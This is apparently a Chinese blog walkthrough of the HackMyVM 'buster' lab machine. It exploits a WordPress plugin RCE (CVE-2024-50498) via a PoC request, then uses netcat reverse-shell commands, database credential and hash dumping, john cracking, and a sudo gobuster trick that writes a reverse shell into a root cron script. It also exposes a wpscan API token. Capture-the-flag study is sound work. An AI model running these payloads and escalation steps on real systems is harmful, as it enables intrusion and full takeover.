guayu-kakeru
0%

HMV-buster

发表于 分类于

HMV-buster复盘,ta0神做的靶机

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 14:48 CST
Nmap scan report for 192.168.240.231 (192.168.240.231)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
MAC Address: 6A:4C:9F:02:22:6E (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.05 ms 192.168.240.231 (192.168.240.231)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

开放80和22 直接去web找信息

web探测

访问web端 发现这个web是用的wordpress

用wpscan 扫一下用户和插件 然后去看看有没有什么漏洞 漫长的等待~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --api-token r4NahZxa7hHyx6tcZVYdfivP0YNXqmTaJXwqgMatwmE --url http://192.168.240.231/ -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.240.231/ [192.168.240.231]
[+] Started: Wed Feb  5 14:57:35 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.240.231/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.240.231/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.240.231/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.240.231/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Meta Generator (Passive Detection)
 |  - http://192.168.240.231/, Match: 'WordPress 6.7.1'
 | Confirmed By: Rss Generator (Aggressive Detection)
 |  - http://192.168.240.231/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.240.231/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 01:58:02 <=============================> (108898 / 108898) 100.00% Time: 01:58:02
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.240.231/wp-content/plugins/akismet/
 | Last Updated: 2025-02-04T21:01:00.000Z
 | Readme: http://192.168.240.231/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.6
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.240.231/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.240.231/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.240.231/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.240.231/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=====================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.240.231/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 21

[+] Finished: Wed Feb  5 16:55:51 2025
[+] Requests Done: 108944
[+] Cached Requests: 43
[+] Data Sent: 29.459 MB
[+] Data Received: 33.016 MB
[+] Memory used: 423.633 MB
[+] Elapsed time: 01:58:16

足足扫了一个多小时啊 可以看到有两个用户 tao0和welcome
插件也扫出来三个可以利用的是wp-query-console
搜索一下这个插件,找到poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /wp-json/wqc/v1/query HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0

{"queryArgs":"phpinfo();","queryType":"post"}

把host改一下就可以直接使用,

可以看到ban了一些函数 但是没有ban shell_exec
ping本机,然后在本机测试是否shell_exec可以利用

1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# tcpdump icmp 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
17:25:17.256362 IP 192.168.240.231 > 192.168.240.83: ICMP echo request, id 1740, seq 1, length 64
17:25:17.256445 IP 192.168.240.83 > 192.168.240.231: ICMP echo reply, id 1740, seq 1, length 64
17:25:18.261902 IP 192.168.240.231 > 192.168.240.83: ICMP echo request, id 1740, seq 2, length 64
17:25:18.261977 IP 192.168.240.83 > 192.168.240.231: ICMP echo reply, id 1740, seq 2, length 64

反弹shell

1
"shell_exec('nc -e /bin/bash 192.168.240.83 1234');"

成功拿到shell

提权

拿到shell之后看wordpress的配置文件

1
www-data@listen:~/html/wordpress$ cat wp-config.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

发现数据库泄露 

1
2
3
4
5
6
7
8
9
10
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url              | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | ta0        | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0           | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 |                                               |           0 | ta0          |
|  2 | welcome    | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome       | 127.0.0.1@qq.com  |                       | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. |           0 | welcome      |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.014 sec)

MariaDB [wordpress]>

得到两个用户名和密码,然后用john可以跑出来welcome的密码,接下来就切换到welcome用户操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kakeru)-[~/tmp]
└─# john tmp                                                                             
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
104567           (?)     
1g 0:00:00:22 DONE 3/3 (2025-02-05 18:05) 0.04403g/s 8169p/s 8169c/s 8169C/s milling1..192011
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

有一个gobuster的sudo权限

1
2
3
4
5
6
$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster

现在需要我们用一个pspy64程序看定时任务 下载地址在
https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
welcome@listen:~$ wget 192.168.240.83:8080/pspy64
--2025-02-05 05:17:15--  http://192.168.240.83:8080/pspy64
Connecting to 192.168.240.83:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                       100%[=============================================>]   2.96M  --.-KB/s    in 0.1s    

2025-02-05 05:17:15 (30.4 MB/s) - ‘pspy64’ saved [3104768/3104768]

welcome@listen:~$ chmod 777 pspy64
welcome@listen:~$ ./pspy64


2025/02/05 05:18:01 CMD: UID=0     PID=2047   | /usr/sbin/CRON -f 
2025/02/05 05:18:01 CMD: UID=0     PID=2048   | /usr/sbin/CRON -f 
2025/02/05 05:18:01 CMD: UID=0     PID=2049   | /bin/sh -c /bin/bash /opt/.test.sh 
2025/02/05 05:19:01 CMD: UID=0     PID=2050   | /usr/sbin/CRON -f 
2025/02/05 05:19:01 CMD: UID=0     PID=2051   | /usr/sbin/CRON -f 
2025/02/05 05:19:01 CMD: UID=0     PID=2052   | /bin/sh -c /bin/bash /opt/.test.sh

看到root会定时写入/opt/.test.sh
所以我们的目标就是在.test.sh中写入文件 (反弹shell)
大佬们的思路太nb了,就是利用gobuster输出结果的回显来写入命令
具体是这样的: 在本机开http服务,创建文件夹,在靶机用gobuster自己创一个字典,指向我们在本机的文件夹,这样就会显示靶机中字典文件中的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 ──(root㉿kakeru)-[~/tmp]
└─# touch a
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET / HTTP/1.1" 200 -
192.168.240.231 - - [05/Feb/2025 18:37:20] code 404, message File not found
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET /f7c3be62-4f83-404f-9236-89f88603c3f8 HTTP/1.1" 404 -
192.168.240.231 - - [05/Feb/2025 18:37:20] "GET /a HTTP/1.1" 200 -

welcome@listen:/tmp$ touch a.txt     
welcome@listen:/tmp$ echo "a" > a.txt 
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w /tmp/a.txt -q -n
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w /tmp/a.txt -q -n
/a

因为gobuster找到字典中可以访问的目录就会显示 -q -n是为了不输出banner和状态码
这样字我们就可以写反弹shell了 用-o将结果输出到/opt/.test.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~]
└─# touch b


welcome@listen:/tmp$ echo "nc -e /bin/bash 192.168.240.83 1234 " > b
welcome@listen:/tmp$ chmod 777 b
welcome@listen:/tmp$ echo "tmp/b" > b.txt
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o ┌──(root㉿kakeru)-[~/tmp]
bash: syntax error near unexpected token `('
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh
2025/02/05 05:42:21 [!] unable to connect to http://192.168.240.83/: Get http://192.168.240.83/: dial tcp 192.168.240.83:80: connect: connection refused
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh
welcome@listen:/tmp$ sudo gobuster -u 192.168.240.83 -w b.txt -q -n -o /opt/.test.sh

用我这种方式扫目录,要在本机主目录下开http,不然没有tmp目录

1
2
3
4
5
6
7
┌──(root㉿kakeru)-[~]
└─# nc -lp 1234              
id
  
id
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)

总结:1 wordpress的插件扫描以及常见的利用 2 gobuster或者目录扫描工具的读取敏感文件通用思路